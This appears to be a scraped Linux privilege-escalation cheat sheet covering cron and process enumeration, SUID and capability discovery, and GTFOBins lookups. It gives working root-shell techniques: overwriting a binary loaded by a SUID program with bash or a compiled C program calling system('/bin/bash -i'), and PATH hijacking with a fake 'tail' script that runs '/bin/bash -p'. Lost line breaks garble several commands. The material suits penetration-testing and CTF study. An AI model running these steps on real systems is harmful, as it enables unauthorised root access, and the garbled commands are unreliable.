Search scripts that execute programs. Search for any vulnerable version. One example: chkrootkit v0.49 (running as root)
ps auxNote: It’s possible that another user (e.g., root) is running a cron job that executes a script periodically, which you may not be able to see. Therefore, it’s crucial to identify and enumerate all potential programs that could be vulnerable.
# World-writable files - E.g.: maybe you can edit shadow file
find / -not -type l -perm -o+wsudo -l
# Search on https://gtfobins.github.io/ how to exploitFind all SUID binaries:
find / -perm -4000 2>/dev/nullWell-known binary
Search for the binary on GTFOBins to identify potential exploitation techniques.
Custom binary
Premise: you have binary_name (with suid) that
use/load/execute loaded_binary
Extract strings from the binary – look for shared libraries or binaries being loaded / executed at runtime
strings binary_name(1) Method
cp /bin/bash /path/to/loaded_binary(2) Method
Delete the loaded binary and replace with a new one:
#include <stdio.h>
#include <stdlib.h>
int main() {
system("/bin/bash -i");
return 0;
}# Compile
gcc binary.c -o <loaded_binary>
# Run the binary
./binary_nameSince Linux version 2.2, the system has divided the traditional superuser privileges into distinct units called capabilities [↗]. These capabilities can be independently enabled or disabled, offering more fine-grained control over process privileges. However, if misconfigured, they can be exploited by an attacker to escalate privileges and gain root access.
/usr/sbin/getcap -r / 2>/dev/nullSearch for the binary on GTFOBins to identify potential exploitation techniques.
Analyze the email for any sensitive information:
ls /var/mailsudo -l
strings <program_name>tail -f /var/log/nginx/access.log #!/bin/bash
/bin/bash -pchmod +x /tmp/tailexport PATH=/tmp:$PATH./<program_name>